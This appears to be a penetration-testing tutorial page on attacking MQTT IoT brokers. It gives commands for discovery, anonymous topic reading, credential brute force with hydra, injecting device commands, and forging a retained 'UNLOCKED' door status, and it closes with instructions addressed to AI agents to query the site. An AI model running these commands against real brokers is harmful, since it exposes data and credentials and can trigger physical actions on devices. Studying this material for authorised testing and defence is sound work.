# MQTT (Message Queuing Telemetry Transport) - Port 1883

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic info

MQTT (Message Queuing Telemetry Transport) is a lightweight messaging protocol for IoT devices, using a publish-subscribe model over TCP/IP. The most popular open-source broker implementation is **Mosquitto**. Due to minimal configuration and often insecure deployments, MQTT services are frequently vulnerable to attack.

Key characteristics:

* Default port: TCP 1883 (unencrypted), 8883 (TLS)
* Stateless pub/sub model
* Authentication optional
* Wildcard topics and retained messages

***

### Discovering MQTT Services via Network Scanning

#### Nmap Detection of MQTT Brokers

Scan for MQTT using service and version detection:

```bash
nmap -sV -p 1883,8883 --script mqtt-subscribe <target-ip>
```

Useful Nmap NSE scripts:

* `mqtt-subscribe.nse` — connects and subscribes to common topics
* `mqtt-connect.nse` — attempts anonymous authentication

#### Manual Enumeration with Netcat or Telnet

```bash
telnet <target-ip> 1883
```

A successful connection banner or acknowledgment byte from the broker confirms its presence.

***

### Assessing Authentication and Authorization Mechanisms

Many MQTT brokers allow **anonymous access** by default. Check this using `mosquitto_sub`:

```bash
mosquitto_sub -h <target-ip> -t '#' -v
```

If the broker allows wildcard topic subscription without credentials, it is misconfigured and vulnerable.

Try authentication bypass:

```bash
mosquitto_sub -h <target-ip> -t '#' -v -u test -P test
```

***

### Exploiting Publish and Subscribe for Information Disclosure

#### Read All Topics with Wildcards

```bash
mosquitto_sub -h <target-ip> -t '#' -v
```

This reveals:

* Sensor values
* Credentials sent by devices
* Internal control commands
* Presence of retained messages

#### Publishing Arbitrary Payloads

```bash
mosquitto_pub -h <target-ip> -t 'iot/device/command' -m 'REBOOT'
```

This could trigger real-world actions on connected devices if the topic is subscribed.

***

### Brute Forcing MQTT Credentials

Use `hydra` for credential brute-force:

```bash
hydra -L users.txt -P passwords.txt mqtt://<target-ip>:1883 -V
```

***

### Persistent Attacks with Retained Messages

Retained messages persist even after the publisher disconnects, making them ideal for:

* Persistence payloads
* Credential harvesting
* Fake sensor data injection

Set retained payload:

```bash
mosquitto_pub -h <target-ip> -t 'iot/door/status' -m 'UNLOCKED' -r
```

When a new subscriber connects, it immediately receives the forged message.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/mqtt-message-queuing-telemetry-transport-port-1883.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.